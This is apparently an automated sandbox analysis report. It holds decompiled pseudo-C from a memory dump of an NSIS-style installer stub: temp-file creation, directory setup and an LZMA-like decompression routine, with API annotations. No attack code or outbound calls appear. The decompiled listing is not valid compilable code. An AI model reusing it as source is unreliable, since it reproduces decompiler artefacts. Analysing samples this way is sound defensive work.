                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseValuelstrlen
                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp
                                                                                                                                                                                                                            • API String ID: 2655323295-2564968948
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 958 406187-406193 959 406194-4061c8 GetTickCount GetTempFileNameW 958->959 960 4061d7-4061d9 959->960 961 4061ca-4061cc 959->961 963 4061d1-4061d4 960->963 961->959 962 4061ce 961->962 962->963
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                            				short _t12;
                                                                                                                                                                                                                            				intOrPtr _t13;
                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                            				WCHAR* _t17;
                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                            				signed short _t23;
                                                                                                                                                                                                                            				WCHAR* _t26;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t26 = _a4;
                                                                                                                                                                                                                            				_t23 = 0x64;
                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                            					_t12 =  *L"nsa"; // 0x73006e
                                                                                                                                                                                                                            					_t23 = _t23 - 1;
                                                                                                                                                                                                                            					_v12 = _t12;
                                                                                                                                                                                                                            					_t13 =  *0x40a5ac; // 0x61
                                                                                                                                                                                                                            					_v8 = _t13;
                                                                                                                                                                                                                            					_t14 = GetTickCount();
                                                                                                                                                                                                                            					_t19 = 0x1a;
                                                                                                                                                                                                                            					_v8 = _v8 + _t14 % _t19;
                                                                                                                                                                                                                            					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                                                                                                                                                                            					if(_t17 != 0) {
                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t23 != 0) {
                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *_t26 =  *_t26 & _t23;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                            					return _t17;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t17 = _t26;
                                                                                                                                                                                                                            				goto L4;
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004061A5
                                                                                                                                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                            • API String ID: 1716503409-1968954121
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E004015C1(short __ebx, void* __eflags) {
                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                            				int _t23;
                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                            				signed char _t26;
                                                                                                                                                                                                                            				short _t28;
                                                                                                                                                                                                                            				short _t31;
                                                                                                                                                                                                                            				short* _t34;
                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t28 = __ebx;
                                                                                                                                                                                                                            				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                                                                                                                                                                                            				_t17 = E00405FE2(_t16);
                                                                                                                                                                                                                            				_t32 = _t17;
                                                                                                                                                                                                                            				if(_t17 != __ebx) {
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						_t34 = E00405F64(_t32, 0x5c);
                                                                                                                                                                                                                            						_t31 =  *_t34;
                                                                                                                                                                                                                            						 *_t34 = _t28;
                                                                                                                                                                                                                            						if(_t31 != _t28) {
                                                                                                                                                                                                                            							L5:
                                                                                                                                                                                                                            							_t25 = E00405C16( *(_t36 + 8));
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
                                                                                                                                                                                                                            								goto L5;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t25 = E00405B99( *(_t36 + 8)); // executed
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_t25 != _t28) {
                                                                                                                                                                                                                            							if(_t25 != 0xb7) {
                                                                                                                                                                                                                            								L9:
                                                                                                                                                                                                                            								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                                                                                                                                                                            								if((_t26 & 0x00000010) == 0) {
                                                                                                                                                                                                                            									goto L9;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						 *_t34 = _t31;
                                                                                                                                                                                                                            						_t32 = _t34 + 2;
                                                                                                                                                                                                                            					} while (_t31 != _t28);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                                                                                                                                                                                            					_push(0xfffffff5);
                                                                                                                                                                                                                            					E00401423();
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					E00401423(0xffffffe6);
                                                                                                                                                                                                                            					E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp",  *(_t36 + 8));
                                                                                                                                                                                                                            					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                                                                                                                                                                            					if(_t23 == 0) {
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,7620FAA0,?,7620F560,00405D94,?,7620FAA0,7620F560,00000000), ref: 00405FF0
                                                                                                                                                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                                                                                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                                              • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                                            • API String ID: 1892508949-501415292
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 99%
                                                                                                                                                                                                                            			E00407194() {
                                                                                                                                                                                                                            				signed int _t530;
                                                                                                                                                                                                                            				void _t537;
                                                                                                                                                                                                                            				signed int _t538;
                                                                                                                                                                                                                            				signed int _t539;
                                                                                                                                                                                                                            				unsigned short _t569;
                                                                                                                                                                                                                            				signed int _t579;
                                                                                                                                                                                                                            				signed int _t607;
                                                                                                                                                                                                                            				void* _t627;
                                                                                                                                                                                                                            				signed int _t628;
                                                                                                                                                                                                                            				signed int _t635;
                                                                                                                                                                                                                            				signed int* _t643;
                                                                                                                                                                                                                            				void* _t644;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				L0:
                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                            					L0:
                                                                                                                                                                                                                            					_t530 =  *(_t644 - 0x30);
                                                                                                                                                                                                                            					if(_t530 >= 4) {
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *(_t644 - 0x40) = 6;
                                                                                                                                                                                                                            					 *(_t644 - 0x7c) = 0x19;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                            						L145:
                                                                                                                                                                                                                            						 *(_t644 - 0x50) = 1;
                                                                                                                                                                                                                            						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                            							L149:
                                                                                                                                                                                                                            							if( *(_t644 - 0x48) <= 0) {
                                                                                                                                                                                                                            								goto L155;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							L150:
                                                                                                                                                                                                                            							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                                                                                                                                                                                            							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                                                                                                                                                                                            							 *(_t644 - 0x54) = _t643;
                                                                                                                                                                                                                            							_t569 =  *_t643;
                                                                                                                                                                                                                            							_t635 = _t569 & 0x0000ffff;
                                                                                                                                                                                                                            							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                                                                                                                                                                                            							if( *(_t644 - 0xc) >= _t607) {
                                                                                                                                                                                                                            								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                                                                                                                                                                                            								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                                                                                                                                                                                            								_t628 = _t627 + 1;
                                                                                                                                                                                                                            								 *_t643 = _t569 - (_t569 >> 5);
                                                                                                                                                                                                                            								 *(_t644 - 0x50) = _t628;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								 *(_t644 - 0x10) = _t607;
                                                                                                                                                                                                                            								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                                                                                                                                                                                            								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            								L148:
                                                                                                                                                                                                                            								_t487 = _t644 - 0x48;
                                                                                                                                                                                                                            								 *_t487 =  *(_t644 - 0x48) - 1;
                                                                                                                                                                                                                            								L149:
                                                                                                                                                                                                                            								if( *(_t644 - 0x48) <= 0) {
                                                                                                                                                                                                                            									goto L155;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L150;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								L154:
                                                                                                                                                                                                                            								L146:
                                                                                                                                                                                                                            								if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                                                                                            									L169:
                                                                                                                                                                                                                            									 *(_t644 - 0x88) = 0x18;
                                                                                                                                                                                                                            									L170:
                                                                                                                                                                                                                            									_t579 = 0x22;
                                                                                                                                                                                                                            									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                                                                                                                                                                                            									_t539 = 0;
                                                                                                                                                                                                                            									L172:
                                                                                                                                                                                                                            									return _t539;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								L147:
                                                                                                                                                                                                                            								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                                                                                                                                                            								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                                                                                            								_t484 = _t644 - 0x70;
                                                                                                                                                                                                                            								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                                                                                            								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            								goto L148;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							L155:
                                                                                                                                                                                                                            							_t537 =  *(_t644 - 0x7c);
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                            								L140:
                                                                                                                                                                                                                            								 *(_t644 - 0x88) = _t537;
                                                                                                                                                                                                                            								while(1) {
                                                                                                                                                                                                                            									L1:
                                                                                                                                                                                                                            									_t538 =  *(_t644 - 0x88);
                                                                                                                                                                                                                            									if(_t538 > 0x1c) {
                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									L2:
                                                                                                                                                                                                                            									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
                                                                                                                                                                                                                            										case 0:
                                                                                                                                                                                                                            											L3:
                                                                                                                                                                                                                            											if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L4:
                                                                                                                                                                                                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                                                                                            											_t538 =  *( *(_t644 - 0x70));
                                                                                                                                                                                                                            											if(_t538 > 0xe1) {
                                                                                                                                                                                                                            												goto L171;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L5:
                                                                                                                                                                                                                            											_t542 = _t538 & 0x000000ff;
                                                                                                                                                                                                                            											_push(0x2d);
    asm("cdq");
    _pop(_t581);
    _push(9);
    _pop(_t582);
    _t638 = _t542 / _t581;
    _t544 = _t542 % _t581 & 0x000000ff;
    asm("cdq");
    _t633 = _t544 % _t582 & 0x000000ff;
     *(_t644 - 0x3c) = _t633;
     *(_t644 - 0x1c) = (1 << _t638) - 1;
     *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
    _t641 = (0x300 << _t633 + _t638) + 0x736;
    if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
        L10:
        if(_t641 == 0) {
            L12:
             *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
             *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
            goto L15;
        } else {
            goto L11;
        }
        do {
            L11:
            _t641 = _t641 - 1;
             *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
        } while (_t641 != 0);
        goto L12;
    }
    L6:
    if( *(_t644 - 4) != 0) {
        GlobalFree( *(_t644 - 4));
    }
    _t538 = GlobalAlloc(0x40, 0x600); // executed
     *(_t644 - 4) = _t538;
    if(_t538 == 0) {
        goto L171;
    } else {
         *((intOrPtr*)(_t644 - 0x78)) = 0x600;
        goto L10;
    }
case 1:
    L13:
    __eflags =  *(_t644 - 0x6c);
    if( *(_t644 - 0x6c) == 0) {
        L157:
         *(_t644 - 0x88) = 1;
        goto L170;
    }
    L14:
     *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
     *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
     *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
    _t45 = _t644 - 0x48;
     *_t45 =  *(_t644 - 0x48) + 1;
    __eflags =  *_t45;
    L15:
    if( *(_t644 - 0x48) < 4) {
        goto L13;
    }
    L16:
    _t550 =  *(_t644 - 0x40);
    if(_t550 ==  *(_t644 - 0x74)) {
        L20:
         *(_t644 - 0x48) = 5;
         *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
        goto L23;
    }
    L17:
     *(_t644 - 0x74) = _t550;
    if( *(_t644 - 8) != 0) {
        GlobalFree( *(_t644 - 8));
    }
    _t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
     *(_t644 - 8) = _t538;
    if(_t538 == 0) {
        goto L171;
    } else {
        goto L20;
    }
case 2:
    L24:
    _t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
     *(_t644 - 0x84) = 6;
     *(_t644 - 0x4c) = _t557;
    _t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
    goto L132;
case 3:
    L21:
    __eflags =  *(_t644 - 0x6c);
    if( *(_t644 - 0x6c) == 0) {
        L158:
         *(_t644 - 0x88) = 3;
        goto L170;
    }
    L22:
     *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
    _t67 = _t644 - 0x70;
     *_t67 =  &(( *(_t644 - 0x70))[1]);
    __eflags =  *_t67;
     *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
    L23:
     *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
    if( *(_t644 - 0x48) != 0) {
        goto L21;
    }
    goto L24;
case 4:
    L133:
    _t559 =  *_t642;
    _t626 = _t559 & 0x0000ffff;
    _t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
    if( *(_t644 - 0xc) >= _t596) {
         *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
         *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
         *(_t644 - 0x40) = 1;
        _t560 = _t559 - (_t559 >> 5);
        __eflags = _t560;
         *_t642 = _t560;
    } else {
         *(_t644 - 0x10) = _t596;
         *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
         *_t642 = (0x800 - _t626 >> 5) + _t559;
    }
    if( *(_t644 - 0x10) >= 0x1000000) {
        goto L139;
    } else {
        goto L137;
    }
case 5:
    L137:
    if( *(_t644 - 0x6c) == 0) {
        L168:
         *(_t644 - 0x88) = 5;
        goto L170;
    }
    L138:
     *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
     *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
     *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
     *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
    L139:
    _t537 =  *(_t644 - 0x84);
                                                                                                                                                                                                                            											L140:
                                                                                                                                                                                                                            											 *(_t644 - 0x88) = _t537;
                                                                                                                                                                                                                            											goto L1;
                                                                                                                                                                                                                            										case 6:
                                                                                                                                                                                                                            											L25:
                                                                                                                                                                                                                            											__edx = 0;
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            												L36:
                                                                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                                            												 *(__ebp - 0x34) = 1;
                                                                                                                                                                                                                            												 *(__ebp - 0x84) = 7;
                                                                                                                                                                                                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                                            												goto L132;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L26:
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                                                                            											__esi =  *(__ebp - 0x60);
                                                                                                                                                                                                                            											__cl = 8;
                                                                                                                                                                                                                            											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                                                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                                                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                                                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 4);
                                                                                                                                                                                                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                                                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                                                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                                            											if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                                                                            												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                                                                            													_t98 = __ebp - 0x38;
                                                                                                                                                                                                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                                                                            													__eflags =  *_t98;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												 *(__ebp - 0x38) = 0;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                                                                            											if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                                                                            												L35:
                                                                                                                                                                                                                            												__ebx = 0;
                                                                                                                                                                                                                            												__ebx = 1;
                                                                                                                                                                                                                            												goto L61;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												L32:
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 8);
                                                                                                                                                                                                                            												__ebx = 0;
                                                                                                                                                                                                                            												__ebx = 1;
                                                                                                                                                                                                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                                            												goto L41;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 7:
                                                                                                                                                                                                                            											L66:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                                                                            											if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                                                                            												L68:
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                                            												 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												__eax = 0;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                                            												__al = __al & 0x000000fd;
                                                                                                                                                                                                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                                                                            												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            												goto L69;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L67:
                                                                                                                                                                                                                            											__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                                            											 *(__ebp - 0x84) = 8;
                                                                                                                                                                                                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                                            											goto L132;
                                                                                                                                                                                                                            										case 8:
                                                                                                                                                                                                                            											L70:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                                            												 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                                                                            												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x38);
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 4);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
